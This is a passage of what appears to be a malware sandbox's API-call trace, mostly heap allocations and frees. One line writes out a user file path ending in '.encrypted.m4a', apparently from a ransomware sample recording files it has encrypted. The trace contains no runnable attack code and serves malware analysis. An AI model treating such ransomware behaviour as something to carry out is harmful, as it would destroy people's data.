(HeapHandle=0x770000, Flags=0x0, Size=0x51) returned 0x794b90 [0038.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.encrypted.m4a\r\n", cchWideChar=81, lpMultiByteStr=0x794b90, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 81 [0038.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0038.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0038.110] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x50, lpOverlapped=0x0) returned 1 [0038.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0038.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.110] CloseHandle (hObject=0x128) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.111] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.111] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.112] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.112] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.112] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.112] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c838 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.113] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0038.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.116] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.118] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 